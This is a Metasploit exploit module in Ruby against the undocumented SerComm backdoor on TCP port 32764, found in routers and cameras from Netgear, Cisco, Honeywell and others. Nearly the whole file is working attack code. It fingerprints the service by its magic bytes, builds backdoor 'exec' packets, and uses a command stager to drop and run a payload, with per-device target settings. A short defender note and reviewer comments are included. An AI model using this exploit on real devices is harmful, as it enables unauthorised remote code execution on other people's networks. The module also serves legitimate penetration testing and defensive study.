Path: blob/master/modules/exploits/linux/misc/sercomm_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for the undocumented management service that several
# SerComm-built devices expose on TCP port 32764 (see the TCP-32764
# reference below).  The module fingerprints the service by its 4-byte
# magic and then delivers a payload through the framework's command
# stager using the service's "exec" request.
#
# Defender note: the fixed service port (32764, registered as RPORT) and
# the 4-byte magic values handled by `endian_fingerprint` / `execute_command`
# ("MMcS" / "ScMM") are the observable traits of this traffic; blocking the
# port at the perimeter and alerting on those magics are the practical
# detection / mitigation controls for affected devices.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager

  # Registers module metadata, targets and options.
  #
  # Each target hash may carry per-device tuning that `exploit` reads:
  #   'PackFormat'    - Array#pack template for the request header
  #                     ('VVV' little-endian, 'NNN' big-endian words)
  #   'NoArgs'        - when true, the echo-based stager is run without
  #                     the `-en` arguments
  #   'UploadPath'    - directory the stager writes the payload to
  #   'PayloadEncode' - stager encoding ('hex' or 'octal')
  # "Manual" targets have none of these and take them from the advanced
  # options registered at the bottom instead.
  #
  # @param info [Hash] module info merged by `update_info`
  def initialize(info={})
    super(update_info(info,
      'Name'           => "SerComm Device Remote Code Execution",
      'Description'    => %q{
          This module will cause remote code execution on several SerComm devices.
          These devices typically include routers from NetGear and Linksys.
          This module was tested successfully against several NetGear, Honeywell
          and Cisco devices.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', # Initial discovery, poc
          'Matt "hostess" Andreko <mandreko[at]accuvant.com>' # Msf module
        ],
      'Payload'        =>
        {
          'Space' => 10000, # Could be more, but this should be good enough
          'DisableNops' => true
        },
      'Platform'       => 'linux',
      'Privileged'     => false,
      'Targets'        =>
        [
          ['Generic Linux MIPS Big Endian',
            {
              'Arch' => ARCH_MIPSBE,
              'PackFormat' => 'VVV'
            }
          ],
          ['Generic Linux MIPS Little Endian',
            {
              'Arch' => ARCH_MIPSLE,
              'PackFormat' => 'NNN'
            }
          ],
          # Manual targets: no per-target settings; `exploit` reads the
          # PACKFORMAT / UPLOADPATH / NOARGS / ENCODING advanced options.
          ['Manual Linux MIPS Big Endian',
            {
              'Arch' => ARCH_MIPSBE
            }
          ],
          ['Manual Linux MIPS Little Endian',
            {
              'Arch' => ARCH_MIPSLE
            }
          ],
          ['Cisco WAP4410N',
            {
              'Arch' => ARCH_MIPSBE,
              'PackFormat' => 'NNN',
            }
          ],
          ['Honeywell WAP-PL2 IP Camera',
            {
              'Arch' => ARCH_MIPSLE,
              'PackFormat' => 'VVV'
            }
          ],
          ['Netgear DG834',
            {
              'Arch' => ARCH_MIPSBE,
              'PackFormat' => 'VVV',
              'NoArgs' => true
            }
          ],
          ['Netgear DG834G',
            {
              'Arch' => ARCH_MIPSLE,
              'PackFormat' => 'VVV',
              'PayloadEncode' => 'octal'
            }
          ],
          ['Netgear DG834PN',
            {
              'Arch' => ARCH_MIPSBE,
              'PackFormat' => 'VVV',
              'NoArgs' => true
            }
          ],
          ['Netgear DGN1000',
            {
              'Arch' => ARCH_MIPSBE,
              'PackFormat' => 'VVV',
              'NoArgs' => true
            }
          ],
          ['Netgear DSG835',
            {
              'Arch' => ARCH_MIPSBE,
              'PackFormat' => 'VVV',
              'NoArgs' => true,
            }
          ],
          ['Netgear WPNT834',
            {
              'Arch' => ARCH_MIPSBE,
              'PackFormat' => 'NNN',
              'UploadPath' => '/var',
              'PayloadEncode' => 'octal'
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'References'     =>
        [
          [ 'OSVDB', '101653' ],
          [ 'URL', 'https://github.com/elvanderb/TCP-32764' ]
        ],
      'DisclosureDate' => '2013-12-31' ))

    # The service listens on a fixed port; RPORT only defaults to it.
    register_options(
      [
        Opt::RPORT(32764)
      ])

    # Only consulted for the "Manual" targets (see `exploit`).
    register_advanced_options(
      [
        OptEnum.new('PACKFORMAT', [false, "Pack Format to use", 'VVV', ['VVV', 'NNN']]),
        OptString.new('UPLOADPATH', [false, "Remote path to land the payload", "/tmp" ]),
        OptBool.new('NOARGS', [false, "Don't use the echo -en parameters", false ]),
        OptEnum.new('ENCODING', [false, "Payload encoding to use", 'hex', ['hex', 'octal']]),
      ])
    # The stager flavor is fixed to :echo in `exploit` and the encoding is
    # chosen per target / via ENCODING, so the generic CmdStager options
    # are hidden from the user.
    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
  end

  # Reports the target as vulnerable when the service answers with one of
  # the two known magics; anything else (no answer, connection error)
  # is reported as Safe.
  #
  # @return [Msf::Exploit::CheckCode] Appears or Safe
  def check
    fprint = endian_fingerprint

    case fprint
    when 'BE'
      vprint_status("Detected Big Endian")
      return Msf::Exploit::CheckCode::Appears
    when 'LE'
      vprint_status("Detected Little Endian")
      return Msf::Exploit::CheckCode::Appears
    end

    return Msf::Exploit::CheckCode::Safe
  end

  # Selects the per-device settings and hands off to the command stager,
  # which calls `execute_command` once per staged chunk.
  #
  # Manual targets read the settings from the advanced options; all other
  # targets read them from their target hash (missing keys yield nil).
  def exploit
    if target.name =~ /Manual/
      # NOTE(review): the advanced option registered above is PACKFORMAT,
      # not PACK, so this message under-names it.
      print_warning("Remember you can configure Manual targets with NOARGS, UPLOADPATH, ENCODING and PACK advanced options")
      @no_args = datastore['NOARGS']
      @upload_path = datastore['UPLOADPATH']
      @encoding_format = datastore['ENCODING']
      @pack_format = datastore['PACKFORMAT']
    else
      @no_args = target['NoArgs']
      @upload_path = target['UploadPath']
      @encoding_format = target['PayloadEncode']
      @pack_format = target['PackFormat']
    end

    # @pack_format is consumed by execute_command when building each request.
    execute_cmdstager(
      :noargs => @no_args,
      :temp => @upload_path,
      :enc_format => @encoding_format,
      :flavor => :echo
    )
  end

  # Probes the service with 5 random bytes and classifies it by the prefix
  # of its single response.
  #
  # @return [String, nil] 'BE' when the reply starts with "MMcS",
  #   'LE' when it starts with "ScMM", nil when there is no reply, the
  #   prefix is unknown, or the connection fails
  def endian_fingerprint
    begin
      connect

      sock.put(rand_text(5))
      res = sock.get_once

      # NOTE(review): if put/get_once raise, this disconnect is skipped
      # (the rescue below only reports the error); an `ensure` would
      # guarantee the socket is released.
      disconnect

      if res && res.start_with?("MMcS")
        return 'BE'
      elsif res && res.start_with?("ScMM")
        return 'LE'
      end
    rescue Rex::ConnectionError => e
      print_error("Connection failed: #{e.class}: #{e}")
    end

    return nil
  end

  # Sends one command to the service: a three-word header packed with the
  # target's pack format, immediately followed by the command text.
  # Called by the CmdStager for each chunk produced by `execute_cmdstager`.
  #
  # @param cmd [String] shell command text to send after the header
  # @param opts [Hash] passed by the stager; not used by this method
  def execute_command(cmd, opts)
    # Get the length of the command, for the backdoor's command injection
    # NOTE(review): String#length counts characters, so this equals the
    # byte count only for ASCII commands.
    cmd_length = cmd.length

    # 0x53634d4d => Backdoor code  (the bytes "ScMM" when written big-endian,
    #                the same magic endian_fingerprint looks for in replies)
    # 0x07 => Exec command
    # cmd_length => Length of command to execute, sent after communication struct
    data = [0x53634d4d, 0x07, cmd_length].pack(@pack_format)

    connect
    # Send command structure followed by command text
    sock.put(data+cmd)
    disconnect

    # Fixed 1 s pause after every command; presumably to give the device
    # time to process before the stager sends the next chunk -- TODO confirm.
    Rex.sleep(1)
  end
end